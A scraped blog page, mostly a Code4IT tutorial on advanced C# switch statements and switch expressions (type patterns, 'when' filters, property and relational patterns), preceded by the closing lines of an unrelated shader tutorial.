    const post_noise = (mx_noise_float(vec3(uv(), time.mul(0.1)).mul(sizes.width), 0.03)).mul(1.0);
    
    composer.outputNode = ao_denoise.add(bloom_pass).add(post_noise);

    Alright, that’s it amigas — thanks so much for reading, and I hope it was useful!



    Source link

  • Advanced Switch Expressions and Switch Statements using filters | Code4IT

    Advanced Switch Expressions and Switch Statements using filters | Code4IT


    We all use switch statements in our code. Do you use them at their full potential?


    We all use switch statements in our code: they are a helpful way to run different code paths based on a check on a variable.

    In this short article, we’re gonna learn different ways to write switch blocks, and some nice tricks to create clean and easy-to-read filters on such statements.

    For the sake of this example, we will use a dummy hierarchy of types: a base User record with three subtypes: Player, Gamer, and Dancer.

    public abstract record User(int Age);
    
    public record Player(int Age, string Sport) : User(Age);
    
    public record Gamer(int Age, string Console) : User(Age);
    
    public record Dancer(int Age, string Dance) : User(Age);
    

    Let’s see different usages of switch statements and switch expressions.

    Switch statements

    Switch statements are those with the standard switch (something) block. They allow for different execution paths, acting as a chain of if-else if blocks.

    They can be used to return a value, but it’s not mandatory: you can simply use switch statements to execute code that does not return any value.
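
    For instance, nothing stops you from using a switch statement purely for its side effects, with no value assigned anywhere; a quick sketch using the record types defined above:

    User user = new Dancer(25, "Salsa");
    
    switch (user)
    {
        case Dancer d:
            Console.WriteLine($"I'm a dancer, and I dance {d.Dance}");
            break;
        default:
            Console.WriteLine("My type is not handled!");
            break;
    }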

    Switch statements with checks on the type

    The simplest example we can have is a plain check on the type.

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer:
        {
            message = "I'm a gamer";
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer
    

    Here we execute a different path based on the value the user variable has at runtime.

    We can also have an automatic casting to the actual type, and then use the runtime data within the case block:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); //I'm a gamer, and I have a Nintendo Switch
    

    As you can see, since user is a Gamer, within the related branch we cast it to Gamer and store it in a variable named g, so that we can access its public properties and methods.

    Filtering using the WHEN keyword

    We can add additional filters on the actual value of the variable by using the when clause:

    User user = new Gamer(3, "Nintendo");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g when g.Age < 10:
        {
            message = "I'm a gamer, but too young";
            break;
        }
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer, but too young
    

    Here we have the when g.Age < 10 filter applied to the Gamer g variable.

    Clearly, if we set the age to 30, we will see I’m a gamer, and I have a Nintendo Switch.

    Switch Expression

    Switch expressions act like Switch Statements, but they return a value that can be assigned to a variable or, in general, used immediately.

    They look like a lightweight, inline version of Switch Statements, and have a slightly different syntax.

    To reach the same result we saw before, we can write:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = user switch
    {
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    
    Console.WriteLine(message);
    

    By looking at the syntax, we can notice a few things:

    • instead of having switch(variable_name){}, we now have variable_name switch {};
    • we use the arrow notation => to define the cases;
    • we don’t have the default keyword, but we use the discard value _.

    When keyword vs Property Pattern in Switch Expressions

    Similarly, we can use the when keyword to define better filters on the cases.

    string message = user switch
    {
        Gamer gg when gg.Age < 10 => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Finally, you can use a slightly different syntax to achieve the same result: instead of writing when gg.Age < 10, you can write Gamer { Age: < 10 }. This is called a Property Pattern:

    string message = user switch
    {
        Gamer { Age: < 10 } => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Further readings

    We actually just scratched the surface of all the functionalities provided by the C# language.

    First of all, you can learn more about how to use Relational Patterns in a switch expression.

    To have a taste of it, here’s a short example:

    string Classify(double measurement) => measurement switch
    {
        < -4.0 => "Too low",
        > 10.0 => "Too high",
        double.NaN => "Unknown",
        _ => "Acceptable",
    };
    

    but you can read more here:

    🔗 Relational patterns | Microsoft Docs

    This article first appeared on Code4IT 🐧

    There are also more ways to handle Switch Statements. To learn about more complex examples, here’s the documentation:

    🔗 The switch statement | Microsoft Docs

    Finally, in those examples, we used records. As you saw, I marked the User type as abstract.

    Do you want to learn more about Records?

    🔗 8 things about Records in C# you probably didn’t know | Code4IT

    Wrapping up

    Learning about tools and approaches is useful, but you should also stay up-to-date with language features.

    Switch blocks had a great evolution over time, making our code more concise and distraction-free.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link